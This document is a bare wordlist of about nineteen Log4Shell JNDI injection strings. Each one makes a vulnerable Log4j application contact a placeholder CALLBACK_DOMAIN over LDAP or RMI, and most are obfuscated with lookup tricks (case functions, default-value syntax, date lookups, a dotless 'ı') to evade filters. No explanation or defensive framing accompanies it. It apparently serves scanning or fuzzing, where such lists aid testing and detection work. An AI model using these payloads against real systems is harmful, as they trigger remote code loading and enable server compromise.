${${::-j}${::-n}${::-d}${::-I}:${::-l}${::-d}${::-a}${::-p}://CALLBACK_DOMAIN/payload1}
${${::-j}${::-n}${::-d}${::-I}:${::-r}${::-m}${::-I}://CALLBACK_DOMAIN/payload5}
${${::-j}ndi:rmi://CALLBACK_DOMAIN/payload14}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://CALLBACK_DOMAIN/payload2}
${${lower:${lower:jndi}}:${lower:rmi}://CALLBACK_DOMAIN/payload7}
${${lower:jndi}:${lower:rmi}://CALLBACK_DOMAIN/payload6}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://CALLBACK_DOMAIN/payload9}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://CALLBACK_DOMAIN/payload16}
${${lower:n}${lower:d}i:${lower:rmi}://CALLBACK_DOMAIN/payload8}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://CALLBACK_DOMAIN/payload3}
${j${123123123:-n}di${123123123:-:}ldap:${123123123:-//}CALLBACK_DOMAIN/payload12}
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://CALLBACK_DOMAIN/payload15}
${jnd${123%25ff:-${123%25ff:-i:}}ldap://CALLBACK_DOMAIN/payload11}
${jnd${sys:UNIX:-i}:ldap:/CALLBACK_DOMAIN/payload17}
${jnd${upper:ı}:ldap://CALLBACK_DOMAIN/payload18}
${jndi${123%25ff:-}:ldap://CALLBACK_DOMAIN/payload10}
${jndi:ldap://CALLBACK_DOMAIN/payload4}
${jndi:ldap://127.0.0.1#{\{CALLBACK_DOMAIN}}/{payload13}}
${jndi:rmi://CALLBACK_DOMAIN}
